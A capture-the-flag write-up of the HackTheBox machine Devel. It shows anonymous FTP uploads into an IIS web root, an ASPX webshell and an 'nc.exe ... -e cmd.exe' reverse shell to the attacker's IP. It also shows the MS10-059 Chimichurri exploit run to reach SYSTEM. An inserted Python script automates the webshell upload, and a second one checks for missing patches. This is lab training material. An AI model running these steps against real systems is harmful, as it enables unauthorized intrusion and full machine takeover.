
HackTheBox - Retired - Devel - Updated



Recon

I've been using Threader3000 for my recon scans lately. It's a threaded Python port scanner that runs a quick up/down sweep of all ports and then suggests an nmap service/script scan against whatever it found open.



Just two open ports: 21 and 80.


I like to convert the nmap XML report (-oX) to HTML to make it easier on the eyes. xsltproc picks up the nmap.xsl stylesheet referenced inside the XML file, so no extra arguments are needed:

xsltproc ./10.10.10.5.xml -o ../devel.htb.html





So this looks like a Microsoft box: FTP on port 21 accepting anonymous logins, and Microsoft IIS 7.5 on port 80. IIS 7.5 ships with Windows 7 and Server 2008 R2, which already narrows down the OS we are dealing with.


Let's start with port 80 and see what they are serving up.



Just the standard IIS parking page.


FTP (logged in as anonymous)


The listing looks like the web root of the IIS server on port 80. A quick way to confirm that the FTP root and the web root are the same directory is to upload a harmless marker file over FTP and request it over HTTP.


So anonymous has write permission on the FTP root, which means we can put any file we want in there. Since IIS will execute a .aspx page dropped into its web root, an anonymous-writable web root is effectively remote code execution, so I uploaded a webshell that comes pre-rolled with Kali (cmdasp.aspx, found under /usr/share/webshells/aspx/).




Exploit



Here you can see cmdasp.aspx sitting in the FTP root, which looks like the web root of the IIS server.


Let's see if we can browse to this now.



That was quick and easy.
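The upload-then-browse procedure above, as an added example (not from the original post and not part of the Kali webshell): it uploads a random marker file over anonymous FTP, fetches the same name over HTTP, and only uploads cmdasp.aspx once the bytes come back identical, so you know the FTP root really is the web root before dropping a shell there. The target 10.10.10.5, the anonymous credentials and the Kali path /usr/share/webshells/aspx/cmdasp.aspx are assumptions taken from the post; the marker content is constructed. The check takes the FTP and HTTP operations as callables so it can be exercised without a network.

```python
"""Confirm that an anonymous-writable FTP root is also the IIS web root.

Added example, not code from the original post. Host, ports and file
names are assumptions; the marker file content is constructed.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request


def marker_file():
    """Random .txt name and body, so a stale file left by someone else
    can't produce a false positive."""
    token = secrets.token_hex(8)
    return f"probe_{token}.txt", f"probe {token}\n".encode()


def ftp_root_is_web_root(ftp_put, http_get):
    """Upload a marker via ftp_put(name, data), then fetch it via http_get(name).

    http_get returns the response body as bytes, or None on 404/connection error.
    Returns True only when the body comes back byte-for-byte identical.
    """
    name, body = marker_file()
    ftp_put(name, body)
    fetched = http_get(name)
    return fetched == body


def make_ftp_put(host, port=21, user="anonymous", password="anonymous@"):
    """Build an uploader for a real FTP server (assumed anonymous login)."""
    def put(name, data):
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=10)
            ftp.login(user, password)
            ftp.storbinary(f"STOR {name}", io.BytesIO(data))
    return put


def make_http_get(base_url):
    """Build a fetcher that returns body bytes, or None if the file is not served."""
    def get(name):
        url = f"{base_url.rstrip('/')}/{name}"
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.read()
        except urllib.error.URLError:  # HTTPError (404 etc.) is a subclass
            return None
    return get


def upload_webshell(ftp_put, local_path, remote_name="cmdasp.aspx"):
    """Push the local webshell into the FTP root and return its remote name."""
    with open(local_path, "rb") as fh:
        ftp_put(remote_name, fh.read())
    return remote_name


if __name__ == "__main__":
    # Assumed lab values from the post: target 10.10.10.5, Kali webshell path.
    put = make_ftp_put("10.10.10.5")
    get = make_http_get("http://10.10.10.5/")
    if ftp_root_is_web_root(put, get):
        shell = upload_webshell(put, "/usr/share/webshells/aspx/cmdasp.aspx")
        print(f"FTP root is the web root; browse to http://10.10.10.5/{shell}")
    else:
        print("marker was not served back: FTP root is not the web root, or IIS is not serving it")
```

Delete the marker file afterwards (ftplib's `delete`) so you leave nothing extra behind; the random name also means two people testing the same box won't trip over each other's files.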


I used FTP to upload nc.exe to Devel so we could get a more usable shell than one command at a time through the web form.


I located the files we uploaded by poking around with dir from the web shell; they were in


C:\inetpub\wwwroot\


which is the default IIS web root, so the anonymous FTP root maps straight onto it.


So then I set up a listener on my Kali box:


nc -lnvp 5555


And in the command box of the aspx web shell on Devel I entered:


C:\inetpub\wwwroot\nc.exe 10.10.14.6 5555 -e "cmd.exe"

Then I checked back on my listener and



We do have a shell, though a low-privileged one.


I used FTP to upload winPEAS.bat to Devel to get some basic enumeration of the box.


I don't know what the intended path is to "own" this box, but there are sure a lot of patches it's missing.



I don't know about you, but I love Brazilian food, so that Chimichurri one catches my eye. It looks like there are several vulnerabilities we could use going forward; you might try some of the others and see where you get.


https://rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS10-059



Rapid7 lists it as a privilege-escalation vulnerability (MS10-059 is the Tracing Feature for Services elevation-of-privilege bulletin) that an authenticated local user can use to escalate to SYSTEM, which sounds like exactly what we are looking for. Before running any privesc exploit it's worth confirming the patch really is missing; systeminfo lists the installed hotfixes.
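Both the winPEAS missing-patch list above and the choice of MS10-059 come down to one question: is the KB that closes the bulletin actually installed? Here is an added example (not from the post, and not winPEAS) that parses the Hotfix(s) section of systeminfo output and reports which bulletins from a small hand-picked table have no matching KB. The sample systeminfo text is constructed, and the bulletin-to-KB table is an assumption to confirm against the Microsoft security bulletins; MS10-059 maps to KB982799.

```python
"""Report privilege-escalation bulletins whose KB is absent from a hotfix list.

Added example, not part of the original post or of winPEAS. The systeminfo
text below is constructed; the bulletin-to-KB table is a small hand-picked
subset to be confirmed against the Microsoft bulletins before relying on it.
"""
import re

# Bulletin -> (KB article, short description). Constructed subset, not exhaustive.
PRIVESC_BULLETINS = {
    "MS10-015": ("KB977165", "Windows kernel (KiTrap0D)"),
    "MS10-059": ("KB982799", "Tracing Feature for Services (Chimichurri)"),
    "MS10-092": ("KB2305420", "Task Scheduler"),
    "MS11-046": ("KB2503665", "Ancillary Function Driver (afd.sys)"),
}

# Matches 'KB982799' or 'kb982799' wherever it appears in the hotfix listing.
KB_RE = re.compile(r"\bKB(\d{6,7})\b", re.IGNORECASE)


def installed_hotfixes(systeminfo_text):
    """Return the set of normalised KB ids (e.g. 'KB982799') found in systeminfo output."""
    return {f"KB{m.group(1)}" for m in KB_RE.finditer(systeminfo_text)}


def missing_patches(systeminfo_text, table=PRIVESC_BULLETINS):
    """Return the bulletins from `table` whose KB does not appear in the hotfix list."""
    have = installed_hotfixes(systeminfo_text)
    return sorted(bulletin for bulletin, (kb, _) in table.items() if kb not in have)


# Constructed sample, loosely modelled on a Windows 7 host's systeminfo output.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB977165
                           [02]: KB2305420
"""


if __name__ == "__main__":
    for bulletin in missing_patches(SAMPLE_SYSTEMINFO):
        kb, desc = PRIVESC_BULLETINS[bulletin]
        print(f"{bulletin} ({kb}) not installed: {desc}")
```

A KB missing from the list is a hint, not proof: a later cumulative or superseding update can carry the fix without the original KB ever appearing in systeminfo, so a bulletin reported as missing still deserves a careful test rather than blind trust in the exploit.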


I pretty quickly googled for an exploit and found this precompiled one, which only needs the IP address and port of our listener to send back a reverse shell.


https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri


I downloaded it and used FTP to upload it to C:\inetpub\wwwroot.


Set up a new listener on my Kali box:


nc -lnvp 4455


And from my aspx shell ran this command:


C:\inetpub\wwwroot\Chimichurri.exe 10.10.14.6 4455




And just as advertised, we are NT AUTHORITY\SYSTEM, which means we have full control of the machine.


Just a quick cd over to C:\users\administrator\desktop


And we can get the root flag.



I just realized that we didn't get the user flag; a quick cd over to that folder takes care of it.


This is a redo of the first box I ever did on HackTheBox.eu. I can remember being blown away reading write-ups on this box and how I could follow along and actually "hack" a computer. I'm pleased to say I didn't need any write-ups to follow on this box now; my skills are growing such that this box seemed pretty easy to me. If you are new to this too, keep going. This might seem a bit hard and a bit like magic the first time you do it, but you will get better and have a better understanding of what you are doing if you just keep at it.



Hack The Planet!

